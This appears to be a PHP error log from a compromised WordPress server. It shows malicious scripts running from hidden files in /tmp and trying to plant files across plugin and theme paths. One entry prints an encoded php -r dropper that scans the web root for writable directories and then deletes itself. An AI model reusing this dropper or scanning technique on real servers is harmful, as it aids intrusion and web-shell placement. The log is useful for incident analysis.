[30-Jun-2025 10:59:48 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/upgrade-temp-backup/mod_sections): Failed to open stream: No such file or directory in /tmp/.parle_tokens on line 1
[30-Jun-2025 11:00:31 UTC] PHP Warning:  Undefined array key "file" in /tmp/.multi on line 1
[30-Jun-2025 11:00:31 UTC] PHP Warning:  Trying to access array offset on null in /tmp/.multi on line 1
[30-Jun-2025 11:01:13 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/upgrade-temp-backup/mod_sections): Failed to open stream: No such file or directory in /tmp/.parle_tokens on line 1
[30-Jun-2025 11:01:15 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/astra-sites/inc/lib/ai-builder/Proprietary): Failed to open stream: No such file or directory in /tmp/.created on line 1
[30-Jun-2025 11:01:30 UTC] PHP Warning:  Undefined array key "file" in /tmp/.system on line 1
[30-Jun-2025 11:01:30 UTC] PHP Warning:  Trying to access array offset on null in /tmp/.system on line 1
[30-Jun-2025 11:02:31 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/upgrade-temp-backup/mod_sections): Failed to open stream: No such file or directory in /tmp/.accept on line 1
[30-Jun-2025 11:02:40 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.gQwVSJ3/apps.s/show_intro): Failed to open stream: No such file or directory in /tmp/.locked on line 1
[30-Jun-2025 11:02:58 UTC] PHP Warning:  Undefined array key "file" in /tmp/.config on line 1
[30-Jun-2025 11:02:58 UTC] PHP Warning:  Trying to access array offset on null in /tmp/.config on line 1
[30-Jun-2025 11:05:52 UTC] PHP Warning:  Undefined array key "file" in /tmp/.include on line 1
[30-Jun-2025 11:05:52 UTC] PHP Warning:  Trying to access array offset on null in /tmp/.include on line 1
[30-Jun-2025 11:07:23 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/astra-sites/inc/lib/ai-builder/Proprietary): Failed to open stream: No such file or directory in /tmp/.system on line 1
[30-Jun-2025 11:07:29 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/astra-sites/inc/lib/ai-builder/Proprietary): Failed to open stream: No such file or directory in /tmp/.request on line 1
[30-Jun-2025 11:07:32 UTC] PHP Warning:  Undefined array key "file" in /tmp/.uconvert on line 1
[30-Jun-2025 11:07:32 UTC] PHP Warning:  Trying to access array offset on null in /tmp/.uconvert on line 1
[30-Jun-2025 11:07:35 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/plugins/astra-sites/inc/lib/ai-builder/Proprietary): Failed to open stream: No such file or directory in /tmp/.parle_tokens on line 1
[30-Jun-2025 11:07:35 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/upgrade-temp-backup/mod_sections): Failed to open stream: No such file or directory in /tmp/.dba_insertion on line 1
[30-Jun-2025 11:09:16 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/uploads/2025/06/shortcode-for-current-date/vendor/Guestbook): Failed to open stream: No such file or directory in /tmp/.config on line 1
[30-Jun-2025 11:14:22 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.hfdVgDL/apps.s/goods_script): Failed to open stream: No such file or directory in /tmp/.rfind on line 1
[30-Jun-2025 11:14:27 UTC] PHP Warning:  Undefined array key "file" in /tmp/.post on line 1
[30-Jun-2025 11:14:27 UTC] PHP Warning:  Trying to access array offset on null in /tmp/.post on line 1
[30-Jun-2025 11:14:31 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.hfdVgDL/apps.s/goods_script): Failed to open stream: No such file or directory in /tmp/.uconvert on line 1
[30-Jun-2025 11:14:39 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.hfdVgDL/apps.s/goods_script): Failed to open stream: No such file or directory in /tmp/.mb_convert on line 1
[30-Jun-2025 11:14:51 UTC] PHP Warning:  Undefined array key "file" in /tmp/.created on line 1
[30-Jun-2025 11:14:51 UTC] PHP Warning:  Trying to access array offset on null in /tmp/.created on line 1
[30-Jun-2025 11:18:51 UTC] PHP Warning:  Undefined array key "file" in /tmp/.requests on line 1
[30-Jun-2025 11:18:51 UTC] PHP Warning:  Trying to access array offset on null in /tmp/.requests on line 1
[30-Jun-2025 11:19:00 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.hfdVgDL/apps.s/goods_script): Failed to open stream: No such file or directory in /tmp/.include on line 1
[30-Jun-2025 12:10:31 UTC] PHP Warning:  system(): Unable to fork [php -r '$dirs=array_filter([sys_get_temp_dir(),&quot;/tmp&quot;,&quot;/var/tmp&quot;,ini_get(&quot;upload_tmp_dir&quot;),getenv(&quot;TEMP&quot;),getenv(&quot;TMP&quot;),getcwd()]);$c=rawurldecode(&quot;%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20&quot;);foreach($dirs as $d){if(is_dir($d)&amp;&amp; is_writable($d)){$p=&quot;{$d}/.uconvert&quot;;if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die(&quot;!notwrtbl!&quot;);'] in /home/izorlnspatmm/public_html/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/Pager.php on line 16
[30-Jun-2025 12:33:41 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.nMRS8yV/apps.s/delfromcart): Failed to open stream: No such file or directory in /tmp/.ob_iconv_handle on line 1
[30-Jun-2025 12:35:10 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/themes/corpex/inc/self_assign): Failed to open stream: No such file or directory in /tmp/.rfind on line 1
[30-Jun-2025 12:36:19 UTC] PHP Warning:  Undefined array key "file" in /tmp/.rindex on line 1
[30-Jun-2025 12:36:19 UTC] PHP Warning:  Trying to access array offset on null in /tmp/.rindex on line 1
[30-Jun-2025 12:39:10 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.nMRS8yV/apps.s/delfromcart): Failed to open stream: No such file or directory in /tmp/.post on line 1
[30-Jun-2025 12:45:00 UTC] PHP Warning:  Undefined array key "file" in /tmp/.parle_tokens on line 1
[30-Jun-2025 12:45:00 UTC] PHP Warning:  Trying to access array offset on null in /tmp/.parle_tokens on line 1
[30-Jun-2025 12:51:03 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/themes/corpex/inc/self_assign): Failed to open stream: No such file or directory in /tmp/.created on line 1
[30-Jun-2025 12:55:44 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/themes/corpex/inc/self_assign): Failed to open stream: No such file or directory in /tmp/.created on line 1
[30-Jun-2025 12:59:08 UTC] PHP Warning:  Undefined array key "file" in /tmp/.class on line 1
[30-Jun-2025 12:59:08 UTC] PHP Warning:  Trying to access array offset on null in /tmp/.class on line 1
[30-Jun-2025 13:03:14 UTC] PHP Warning:  file_put_contents(/home/izorlnspatmm/public_html//home/izorlnspatmm/.cpanel/ea-php-cli/public_html/wp-content/themes/corpex/inc/self_assign): Failed to open stream: No such file or directory in /tmp/.ibase_pconnection on line 1
